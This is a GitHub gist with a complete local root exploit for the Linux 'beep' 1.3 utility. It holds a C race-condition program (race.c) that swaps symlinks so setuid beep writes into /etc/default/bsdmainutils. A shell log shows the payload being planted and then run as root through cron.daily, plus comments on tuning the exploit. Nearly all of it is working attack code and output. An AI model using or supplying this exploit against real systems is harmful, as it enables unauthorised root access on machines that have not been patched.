Skip to content

Instantly share code, notes, and snippets.

@fkt fkt/race.c Secret
Last active May 15, 2018

Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
beepbob - thanks @_tsuro!!!!
Raw
gistfile1.txt
fkt@debian:~$ uname -a
Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux
fkt@debian:~$ # wget http://snapshot.debian.org/archive/debian/20160117T220543Z/pool/main/b/beep/beep_1.3-4_amd64.deb
fkt@debian:~$ /usr/bin/beep -v
beep-1.3
fkt@debian:~$ gcc -O2 race.c -o race
fkt@debian:~$ echo "touch /tmp/PWNED" > $(python -c 'print "/tmp/x\x12\x02g",')
fkt@debian:~$ chmod +x /tmp/x*
fkt@debian:~$ ./race 1000 3000 200
2011 1000
[DEBUG] 1 times 1 ms beeps (100 delay between, 0 delay after) @ 440.00 Hz
2012 1000
[DEBUG] 1 times 1 ms beeps (100 delay between, 0 delay after) @ 440.00 Hz
[DEBUG] 1 times 2016356980 ms beeps (2 delay between, 0 delay after) @ 65.00 Hz
WON!!
# if u do not want to wait
fkt@debian:~$ cd / && sudo run-parts /etc/cron.daily
fkt@debian:~$ ls -la /tmp/PWNED
-rw-r--r-- 1 root root 0 Apr 5 06:14 /tmp/PWNED
Raw
race.c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <signal.h>
#include <string.h>
#include <errno.h>
void handle_signal(int signum) {
switch(signum) {
case SIGINT:
case SIGTERM:
wait(NULL);
exit(signum);
}
}
int main(int argc, char **argv)
{
FILE *fp;
char buf[10];
char *l = "b";
int b = atoi(argv[1]);
int e = atoi(argv[2]);
int t = atoi(argv[3]);
int del = b;
char *args[] = { "/usr/bin/beep", "--debug", "-e", l, "-l", "1", "-n", "-d", "2", "-f", "65", "-l", "2016356980", NULL };
signal(SIGINT, handle_signal);
signal(SIGTERM, handle_signal);
while (1) {
int pid = fork();
if ( pid == 0 ) { // child
unlink(l);
symlink("/dev/input/event0", l);
execv(args[0], args);
} else { // parent
usleep(del);
unlink(l);
symlink("/etc/default/bsdmainutils", l);
kill(pid, SIGTERM);
usleep(t);
kill(pid, SIGKILL);
waitpid(pid, NULL, 0);
fp = fopen("/etc/default/bsdmainutils", "r");
fscanf(fp, "%4s", buf);
if(!strcmp(buf, "t*/x")) {
printf("WON!!\n");
exit(0);
}
fclose(fp);
}
del++;
printf("%d %d\n", del, b); fflush(stdout);
if (del > e) {
printf("%d %d\n", del, b); fflush(stdout);
del = b;
usleep(1000*1000);
}
}
return 0;
}
@SpComb

This comment has been minimized.

Sign in to view
Copy link

SpComb commented Apr 5, 2018

I see what you did there

>>> struct.pack('I', 2016356980)
b't*/x'

And it seems like my analysis was actually correct...
@fkt

This comment has been minimized.

Sign in to view
Copy link
Owner Author

fkt commented Apr 6, 2018

Use '*/@ ' or something instead of 't*/x' to avoid fiddling with the \x12\x02g garbage for even more fun! (suggested by @edgarboda)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.